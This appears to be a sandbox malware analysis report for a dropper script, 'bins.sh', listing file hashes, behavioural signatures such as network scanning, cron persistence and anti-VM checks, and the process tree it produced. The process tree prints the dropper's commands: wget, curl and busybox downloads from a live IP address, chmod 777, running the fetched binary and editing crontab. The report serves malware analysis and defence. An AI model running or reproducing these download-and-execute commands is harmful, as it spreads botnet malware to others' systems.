Overview

overview

9

Static

static

1

bins.sh

ubuntu-18.04-amd64

9

bins.sh

debian-9-armhf

9

bins.sh

debian-9-mips

8

bins.sh

debian-9-mipsel

8

Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    24-11-2024 04:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    df284d43c50345c61fb4802b4396a3b3

  • SHA1

    ce94f3d5873280df0c3479ecd725dead3d66b5d7

  • SHA256

    65bb3378f20346a669cf034ec3b3d7760f53296e957bd7a6d3e64bd9e0cd608c

  • SHA512

    3ed1bc581779962db46652c8e0bf1911156c49bc6b5310e7012e499cdcd8ba85876d11fae05c70e0fc4939828d3aa737bf3ff3d3d1ec4e77fa6d85c8460bb031

  • SSDEEP

    192:y5FjD5EdIO+SHL394wy2tQgL394wj0twjD5EdI3:y5K+SHL394wy6QgL394wjwO

Score
9/10
antivmdefense_evasiondiscoveryexecutionpersistenceprivilege_escalatio

Malware Config

Signatures

  • Contacts a large (2037) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:660
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:666
        • /usr/bin/wget
          wget http://216.126.231.240/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          2⤵
          • Writes file to tmp directory
          PID:668
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          2⤵
          • Checks CPU configuration
          • Writes file to tmp directory
          PID:683
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          2⤵
          • Writes file to tmp directory
          PID:690
        • /bin/chmod
          chmod 777 U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          2⤵
          • File and Directory Permissions Modification
          PID:692
        • /tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          ./U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:693
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:695
              • /usr/bin/crontab
                crontab -l
                4⤵
                  PID:696
              • /bin/sh
                sh -c "crontab -"
                3⤵
                  PID:697
                  • /usr/bin/crontab
                    crontab -
                    4⤵
                    • Creates/modifies Cron job
                    PID:698
              • /bin/rm
                rm U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
                2⤵
                  PID:700
                • /usr/bin/wget
                  wget http://216.126.231.240/bins/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
                  2⤵
                    PID:703
                  • /usr/bin/curl
                    curl -O http://216.126.231.240/bins/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
                    2⤵
                      PID:704

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • /tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
                    Filesize

                    141KB

                    MD5

                    3ca8decdb1e52c423c521bfff02ac200

                    SHA1

                    8621ecd6807109b8541912ad9e134f6fb49bfd48

                    SHA256

                    dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

                    SHA512

                    b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

                    Download Submit

                  • /var/spool/cron/crontabs/tmp.RTHjBD
                    Filesize

                    210B

                    MD5

                    86fefeea6c6f64812c9acf65e3be7738

                    SHA1

                    b8a70aad8d4bbf8ccdd471cfdf7f6e12d9e0c9be

                    SHA256

                    5208280af02ce15ad2290970ee2fd17f6908d0e0aa11fc7026dda694797caa12

                    SHA512

                    284642cb50126997a5f523fa2c5871347307dc9b5c7fd86de8dc9a1ea2a7b5c1ab895ad94c567ea45a423d0e175f799512f1879e7fc2561c93b55ddc739666b8

                    Download Submit